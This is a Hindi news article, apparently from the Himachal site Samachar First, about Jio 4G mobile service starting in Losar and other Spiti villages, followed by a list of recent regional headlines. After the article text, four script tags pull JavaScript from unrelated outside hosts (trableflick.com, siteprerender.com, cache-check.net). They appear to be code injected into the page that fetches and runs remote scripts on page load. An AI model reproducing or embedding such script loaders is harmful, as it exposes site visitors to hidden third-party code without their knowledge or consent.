Categories: हिमाचल

लाहौल-स्पीति के लोसर में जिओ फॉर जी मोबाइल सेवा शुरू

<p>लाहौल-स्पीति के लोसर में जिओ फॉर जी मोबाइल सेवा शुरू हो गई है। स्थानीय लोगों ने आईटी, तकनीकी शिक्षा और जन जातीय मंत्री डॉ राम लाल मार्कंड़य का विशेष आभार व्यक्त किया है। इसके साथ ही एडीएम ज्ञान सागर नेगी, स्थानीय नेतागणों का आभार व्यक्त किया एवं साथ ही jio के स्पीति उपमण्डल में कार्यरत उच्च अधिकारी अतुल माने सहित समस्त कर्मचारियों का भी विशेष तौर पर धन्यवाद किया। जिन्होंने इस कोविड-19 महामारी के मध्य सभी मुश्किलों औऱ सावधानियों पर विशेष ध्यान रखते हुए।</p>

<p>स्पीति उपमंडल में हुरलिंग, ताबो, लारा, क्युलिंग, क्यामो एवम लोसर में जिओ नेटवर्क के टॉवर स्थापित किये और को 4G नेटवर्क से जोड़ा। साथ ही गांववासियों का भी धन्यवाद किया। जिन्होंने इस कठिन दौर में जिओ नेटवर्क स्थापित करने में कम्पनी वालों का भरपूर सहयोग किया। जून माह से लेकर नवंबर तक स्पीती में लॉकडाउन के दौरान टावर लगाने का कार्य पूरा किया है। लोसर के सोनम दोरजे एवं जांगचुक गेला नंबरदार ग्राम लोसर सहित अन्य ने संयुक्त बयान में कहा कि पिछले कई सालों से लोसर दूर संचार सेवाओं से पिछड़ा हुआ था।</p>

<p>अब जिओ इंटरनेट सुविधा शुरू होने से जहां लोगों को कई सुविधाएं मिलेगी बल्कि रोजगार के साधन भी उपलब्ध होंगे। लोगों को अपने काम के लिए काजा या अन्य स्थानों पर नहीं जाना पड़ेगा। अब घर बैठे ऑनलाइन काम करवा सकते हैं। जियो टीम ने लॉकडाउन में तेज़ गति से टॉवर लगाने का काम किया है। जिओ टीम के अधिकारियों और कर्मचारियों का विशेष आभारी रहेंगे। पर्यटन के करोबार को इंटरनेट के माध्यम से काफी तीव्र गति मिलेंगे। वहीं, पर्यटकों को अब इंटरनेट के माध्यम से कई सुविधाएं मिल सकेंगी।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1605696313424″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

13 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

14 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

14 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

15 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

16 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

16 hours ago